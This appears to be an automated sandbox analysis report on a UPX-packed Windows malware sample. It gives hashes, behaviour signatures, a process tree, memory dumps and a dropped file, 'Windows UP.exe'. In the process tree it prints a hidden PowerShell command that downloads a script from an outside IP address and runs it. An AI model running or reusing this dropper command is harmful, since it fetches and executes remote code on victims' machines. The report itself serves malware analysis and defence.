Overview

overview

10

Static

static

3

ae0dc28c73...ee.exe

windows7-x64

10

ae0dc28c73...ee.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    134s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23/05/2024, 18:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe

  • Size

    2.6MB

  • MD5

    932a2b0f00ce7406a03590142d7418bc

  • SHA1

    67b28f17cee2ca441ff511cab32c60e210baea55

  • SHA256

    ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee

  • SHA512

    0c16bd2b105bf9a1da98073e1d11e5d417f0cd1ba5c872b46ff64c793c8caaf212353e3ff21deea2c10e450d814d41b02c82f82616189aa25d96789f968a538c

  • SSDEEP

    49152:t+UIsZarvwaSte+aMkkb1qE1o7XT9/14DM:3parvxue+alkjkXT9/14D

Score
10/10
executionupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://222.186.141.207:8895/R29kTG9hZA==

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • UPX packed file 25 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe
    "C:\Users\Admin\AppData\Local\Temp\ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2136
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2884
    • C:\ProgramData\ini\Windows UP.exe
      "C:\ProgramData\ini\Windows UP.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:2088

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \ProgramData\ini\Windows UP.exe
    Filesize

    1.1MB

    MD5

    dc8792077ca599dfda04754132404c60

    SHA1

    256c309a710b4c2c3820711f2cf7f483ae67320b

    SHA256

    b2e8005c41bb19989cae0776ec087679ab49c91b5279d55b158e20473c657e16

    SHA512

    d96542d0b06a1409bbf6c1088292c59b6fbdd098a5f867c20fc8f93db7e61e3f62eb548491960ae6db2da699a2058b02bb95a82b31ed74a77b5039ea44bde285

    Download Submit

  • memory/640-10-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-12-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-17-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-51-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-39-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-55-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-53-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-49-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-47-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-45-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-44-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-41-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-38-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-35-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-34-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-31-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-29-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-27-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-25-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-23-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-21-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-19-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-15-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-14-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/640-13-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

    Download

  • memory/2088-57-0x0000000010000000-0x0000000010024000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2088-62-0x0000000010000000-0x0000000010024000-memory.dmp

    Filesize

    144KB

    Download